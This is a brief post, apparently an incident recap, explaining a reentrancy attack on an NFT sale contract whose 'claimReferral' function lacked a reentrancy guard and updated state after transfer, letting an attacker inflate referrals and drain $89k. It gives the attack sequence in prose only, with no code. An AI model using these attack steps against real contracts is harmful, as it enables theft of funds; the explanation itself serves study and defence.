Typical reentrancy attack.
Victim contract is a contract for NFT sale.
As you can see in picture, there’s no reentrance check in “claimReferral” function, also state is updated after token transfer, this is vulnerable to reentrancy attack.
Hacker bought some NFTs he made to increase “referral” value, then called “claimReferral” recursively to drain victim contract.
Victim lost $89k.
Leave a Reply